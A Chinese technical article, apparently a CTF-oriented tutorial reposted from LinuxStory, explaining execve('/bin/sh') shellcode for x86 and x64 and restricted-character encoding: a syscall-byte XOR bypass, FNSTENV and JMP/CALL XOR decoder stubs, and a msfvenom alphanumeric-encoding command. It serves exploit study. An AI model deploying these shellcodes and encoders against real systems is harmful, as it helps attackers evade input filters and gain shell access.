最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網(wǎng) 會員登陸 & 注冊

深度解析shellcode原理及編碼技術(shù)

2023-06-30 22:19 作者:Linux-Story  | 我要投稿

shellcode原理

系統(tǒng)調(diào)用execve("/bin/sh", 0, 0)

具體可以參考系統(tǒng)調(diào)用表、64位linux中斷向量表

64位

寄存器:

rax = 0x3b rdi = "/bin/sh" rsi = 0 rdx = 0

一段簡單的 shellcode:

mov rax, 0x68732f6e69622f push rax mov rdi, rsp xor rsi, rsi xor rdx, rdx push 0x3b pop rax syscall

32位

寄存器:

eax = 0xb ebx = "/bin/sh" ecx = 0 edx = 0

一段簡單的 shellcode:

push 0x68732f push 0x6e69622f mov ebx, esp xor edx, edx xor eax, eax int 0x80

shellcode編碼技術(shù)

限制字符集的shellcode:

  • 一般的可以直接用工具生成。

  • 限制嚴(yán)格的需要進(jìn)行手寫

手寫shellcode

思路一:

  1. 根據(jù)限制的字符集列出對應(yīng)的可以使用的指令

  2. 對上面的 shellcode 進(jìn)行修改

  3. 再轉(zhuǎn)為對應(yīng)的機(jī)器碼

思路二(ALPHA3就是這么實現(xiàn)的):

  1. 創(chuàng)建一個能夠滿足字符集的解碼器

  2. 根據(jù)解碼器將shellcode編碼成能夠滿足字符集

這里參考Writing IA32 Restricted Instruction Set Shellcode Decoder Loops講講思路二。

首先,考慮為什么要解碼:過濾輸入的一個普遍問題是編碼數(shù)據(jù)中每個字節(jié)可以具有的可能值少于 256 個。但是必須假設(shè)原始數(shù)據(jù)可以包含所有 256 個可能的字節(jié)。 這意味著必須使用兩個或更多字節(jié)來編碼一個字節(jié)。

編碼后的 shellcode 要在程序中運(yùn)行需要附帶解碼器先進(jìn)行解碼,大概是下面的結(jié)構(gòu):

[decoder][encoded shellcodes]

接下來是解碼器實現(xiàn)的一些細(xì)節(jié)問題。

解碼器

解碼器循環(huán):

.-> | 1. 讀取編碼數(shù)據(jù) (input) | L | 2. 解碼 | O | 3. 保存結(jié)果 (output) | O | 4. 移動到下一段數(shù)據(jù) | P | 5. 檢查是否到達(dá)數(shù)據(jù) `--'| 6. 如果沒到跳轉(zhuǎn)至第1步 V (decoding finished)

重定位

解碼器需要知道編碼過的shellcode在內(nèi)存中的位置才能進(jìn)行解碼。由于 shellcode 是被插入到程序中的,而且一些程序還開啟了隨機(jī)化保護(hù),并不確定 shellcode 的實際位置,因此解碼器中 shellcode 的位置操作數(shù)不能寫死,而需要動態(tài)計算。這可以利用重定位技術(shù)實現(xiàn)。

其中一種重定位技術(shù)實現(xiàn)方法是:

  1. 利用特殊指令call、fnstenv等動態(tài)獲取當(dāng)前指令的運(yùn)行時地址

  2. 計算該地址與當(dāng)前指令相對shellcode的偏移的差值(被稱為delta offset)

  3. 將該差值加到對應(yīng)數(shù)據(jù)與該指令相對偏移上,得到的就是運(yùn)行時數(shù)據(jù)的正確地址

Patch

對編碼器種和補(bǔ)丁中不符合要求的指令可以再編碼以使其符合要求。

syscall繞過

不允許出現(xiàn)syscall 字符時(\x0f\x05)

一般會利用一個0x9090 ^ 0x959f=0x0f05, 如下:

xor word ptr[rip], 0x959f nop nop ? ?;0x909

使用0偏移

使用偏移為0的操作數(shù),表示的意義相同,但生成的機(jī)器碼不同:

00 00 add %al, (%eax) 00 40 00 add %al, 0(%eax)

FNSTENV XOR decoder

fnstenv指令將最后執(zhí)行的一條FPU指令相關(guān)的協(xié)處理器的信息保存在指定的內(nèi)存中,保存的信息偏移12字節(jié)處就是最后執(zhí)行的浮點指令的運(yùn)行時地址。

global _start _start: fabs ? ? ? ? ? ?; fabs指令 fnstenv [esp] ? ? ; 保存環(huán)境,該結(jié)構(gòu)偏移12字節(jié)處就是最后執(zhí)行的浮點指令的運(yùn)行時地址 pop edx pop edx pop edx pop edx ? ? ? ? ? ?;此處將fabs指令的運(yùn)行時地址傳給edx sub dl, -25 ? ? ; offset from fabs -> xor buffer ? ?edx = edx + 25,25的大小指的是從shllcode到fabs的偏移 begin: xor ecx,ecx ? ? ? ?; 清零循環(huán)計數(shù)器ecx sub cx, -0x15F ? ? ; 設(shè)置cx為shellcode長度 decode: xor byte [ebx], 0x99 ? ?; 異或key來解碼 inc ebx ? ? ? ? ? ? ? ? ; 進(jìn)入下一字節(jié) loop decode ? ? ? ? ? ? ? ?; 循環(huán)解碼 shellcode: db ...........................

JMP/CALL decoder

global _start _start: jmp short getdata ? ?; 跳轉(zhuǎn)到getdata begin: pop ebx ? ? ? ? ; 彈出shellcode的地址 xor ecx,ecx ? ? ? ?; 清零循環(huán)計數(shù)器ecx sub cx, -0x15F ? ? ; 設(shè)置cx為shellcode長度 decode: xor byte [ebx], 0x99 ? ?; 異或key來解碼 inc ebx ? ? ? ? ? ? ? ? ; 進(jìn)入下一字節(jié) loop decode ? ? ? ? ? ? ? ?; 循環(huán)解碼 jmp short shellcode ? ? ; 跳到解碼完成的shellcode getdata: call begin ? ?; 將下一條指令(shellcode)位置壓棧,跳到begin shellcode: ? ?; 異或加密后的shellcode db ..........................

shellcode工具

字符集

alphanumeric指令集

  • Alphanumeric shellcode:用的 AT&T 語法,%{16bit}表示16位寄存器,(%{64bit})表示64位寄存器指針,[byte]表示字節(jié)大小立即數(shù)。

  • X86 alphanumeric opcodes

  • X64 alphanumeric opcodes

ascii指令集

  • Ascii shellcode

編碼工具

可以利用工具進(jìn)行編碼,但是現(xiàn)在的題目限制比較嚴(yán)格,一般都要手寫:

  • pwntools encoders:這個用作者的話來說目前還是一團(tuán)糟,沒啥用

  • msfvenom:目前我用的這個,比較好安裝,使用也沒什么問題

  • ALPHA3:這個安裝好像有點不便,兼容性也有些問題

  • AE64

  • PolyAsciiShellGen: Caezar ASCII Shellcode Generator

pwntools encoders

安裝方法不介紹了。

使用方法看文檔:https://docs.pwntools.com/en/latest/encoders.html

msfvenom

安裝

msf的一個模塊。Kali下自帶,其他環(huán)境到官網(wǎng)裝。

使用

先執(zhí)行msfvenom -l encoders挑選一個編碼器:

$ msfvenom -l encoders ? ? ? ? Framework Encoders [--encoder <value>] ====================================== ? ?Name ? ? ? ? ? ? ? ? ? ? ? ? ?Rank ? ? ? Description ? ?---- ? ? ? ? ? ? ? ? ? ? ? ? ?---- ? ? ? ----------- ? ?cmd/brace ? ? ? ? ? ? ? ? ? ? low ? ? ? ?Bash Brace Expansion Command Encoder ? ?cmd/echo ? ? ? ? ? ? ? ? ? ? ?good ? ? ? Echo Command Encoder ? ?cmd/generic_sh ? ? ? ? ? ? ? ?manual ? ? Generic Shell Variable Substitution Command Encoder ? ?cmd/ifs ? ? ? ? ? ? ? ? ? ? ? low ? ? ? ?Bourne ${IFS} Substitution Command Encoder ? ?cmd/perl ? ? ? ? ? ? ? ? ? ? ?normal ? ? Perl Command Encoder ? ?cmd/powershell_base64 ? ? ? ? excellent ?Powershell Base64 Command Encoder ? ?cmd/printf_php_mq ? ? ? ? ? ? manual ? ? printf(1) via PHP magic_quotes Utility Command Encoder ? ?generic/eicar ? ? ? ? ? ? ? ? manual ? ? The EICAR Encoder ? ?generic/none ? ? ? ? ? ? ? ? ?normal ? ? The "none" Encoder ? ?mipsbe/byte_xori ? ? ? ? ? ? ?normal ? ? Byte XORi Encoder ? ?mipsbe/longxor ? ? ? ? ? ? ? ?normal ? ? XOR Encoder ? ?mipsle/byte_xori ? ? ? ? ? ? ?normal ? ? Byte XORi Encoder ? ?mipsle/longxor ? ? ? ? ? ? ? ?normal ? ? XOR Encoder ? ?php/base64 ? ? ? ? ? ? ? ? ? ?great ? ? ?PHP Base64 Encoder ? ?ppc/longxor ? ? ? ? ? ? ? ? ? normal ? ? PPC LongXOR Encoder ? ?ppc/longxor_tag ? ? ? ? ? ? ? normal ? ? PPC LongXOR Encoder ? ?ruby/base64 ? ? ? ? ? ? ? ? ? great ? ? ?Ruby Base64 Encoder ? ?sparc/longxor_tag ? ? ? ? ? ? normal ? ? SPARC DWORD XOR Encoder ? ?x64/xor ? ? ? ? ? ? ? ? ? ? ? normal ? ? XOR Encoder ? ?x64/xor_context ? ? ? ? ? ? ? normal ? ? Hostname-based Context Keyed Payload Encoder ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?x64/xor_dynamic ? ? ? ? ? ? ? normal ? ? Dynamic key XOR Encoder ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?x64/zutto_dekiru ? ? ? ? ? ? ?manual ? ? Zutto Dekiru ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?x86/add_sub ? ? ? ? ? ? ? ? ? manual ? ? Add/Sub Encoder ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?x86/alpha_mixed ? ? ? ? ? ? ? low ? ? ? ?Alpha2 Alphanumeric Mixedcase Encoder ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?x86/alpha_upper ? ? ? ? ? ? ? low ? ? ? ?Alpha2 Alphanumeric Uppercase Encoder ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?x86/avoid_underscore_tolower ?manual ? ? Avoid underscore/tolower ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?x86/avoid_utf8_tolower ? ? ? ?manual ? ? Avoid UTF8/tolower ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?x86/bloxor ? ? ? ? ? ? ? ? ? ?manual ? ? BloXor - A Metamorphic Block Based XOR Encoder ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?x86/bmp_polyglot ? ? ? ? ? ? ?manual ? ? BMP Polyglot ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?x86/call4_dword_xor ? ? ? ? ? normal ? ? Call+4 Dword XOR Encoder ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?x86/context_cpuid ? ? ? ? ? ? manual ? ? CPUID-based Context Keyed Payload Encoder ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?x86/context_stat ? ? ? ? ? ? ?manual ? ? stat(2)-based Context Keyed Payload Encoder ? ?x86/context_time ? ? ? ? ? ? ?manual ? ? time(2)-based Context Keyed Payload Encoder ? ?x86/countdown ? ? ? ? ? ? ? ? normal ? ? Single-byte XOR Countdown Encoder ? ?x86/fnstenv_mov ? ? ? ? ? ? ? normal ? ? Variable-length Fnstenv/mov Dword XOR Encoder ? ?x86/jmp_call_additive ? ? ? ? normal ? ? Jump/Call XOR Additive Feedback Encoder ? ?x86/nonalpha ? ? ? ? ? ? ? ? ?low ? ? ? ?Non-Alpha Encoder ? ?x86/nonupper ? ? ? ? ? ? ? ? ?low ? ? ? ?Non-Upper Encoder ? ?x86/opt_sub ? ? ? ? ? ? ? ? ? manual ? ? Sub Encoder (optimised) ? ?x86/service ? ? ? ? ? ? ? ? ? manual ? ? Register Service ? ?x86/shikata_ga_nai ? ? ? ? ? ?excellent ?Polymorphic XOR Additive Feedback Encoder ? ?x86/single_static_bit ? ? ? ? manual ? ? Single Static Bit ? ?x86/unicode_mixed ? ? ? ? ? ? manual ? ? Alpha2 Alphanumeric Unicode Mixedcase Encoder ? ?x86/unicode_upper ? ? ? ? ? ? manual ? ? Alpha2 Alphanumeric Unicode Uppercase Encoder ? ?x86/xor_dynamic ? ? ? ? ? ? ? normal ? ? Dynamic key XOR Encoder

根據(jù)輸入的 shellcode 編碼為 linux 平臺 x86 架構(gòu) BufferRegister=EAX 的純字母shellcode:

$ echo "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" | msfvenom -p - -e x86/alpha_mixed -a linux -f raw -a x86 --platform linux BufferRegister=EAX -o payload

BufferRegister=EAX 用來告訴編碼器 shellcode 的位置保存在哪個寄存器中,用于編碼器在內(nèi)存中找到 shellcode 的位置,對編碼后的 shellcode 進(jìn)行解碼

具體可以參考Linux pwn入門教程(2)—shellcode的使用

數(shù)據(jù)庫

可以直接查找現(xiàn)成的 shellcode

  • Exploit Database Shellcodes

  • Shellcodes database for study cases

參考

  1. shellcode題目整理, https://tttang.com/archive/1447/

  2. shellcode 開發(fā), https://firmianay.gitbook.io/ctf-all-in-one/4_tips/4.9_shellcode

  3. Linux pwn入門教程(2)—shellcode的使用, https://zhuanlan.zhihu.com/p/40006190

  4. 【安全健行】(4):揭開shellcode的神秘面紗, https://blog.51cto.com/windhawkfly/1652463

  5. shellcode xor編碼/解碼[1], https://www.cnblogs.com/moonflow/archive/2012/05/23/2515389.html

  6. Hacking/Shellcode/Restricted instruction set, https://web.archive.org/web/20111023111816/http://skypher.com/wiki/index.php/Hacking/Shellcode/Restricted_instruction_set

  7. Writing IA32 Restricted Instruction Set Shellcode Decoder Loops, http://www.ouah.org/Decoder_%20Loops.html

本文鏈接: https://linuxstory.org/in-depth-analysis-of-shellcode-principle-and-encoding-technology

LinuxStory 原創(chuàng)文章,轉(zhuǎn)載請注明出處,否則必究相關(guān)責(zé)任。


深度解析shellcode原理及編碼技術(shù)的評論 (共 條)

分享到微博請遵守國家法律
蒲江县| 阿拉尔市| 锡林郭勒盟| 皮山县| 南川市| 万安县| 北票市| 秭归县| 黑龙江省| 长白| 黑山县| 安康市| 安平县| 陆川县| 昆山市| 镇康县| 镇雄县| 瑞金市| 乌海市| 台中市| 基隆市| 榆树市| 新龙县| 三亚市| 高邑县| 桃源县| 自治县| 南通市| 英山县| 喀喇沁旗| 仁寿县| 江山市| 成安县| 双鸭山市| 吴堡县| 神农架林区| 齐齐哈尔市| 广宗县| 铜川市| 富川| 同德县|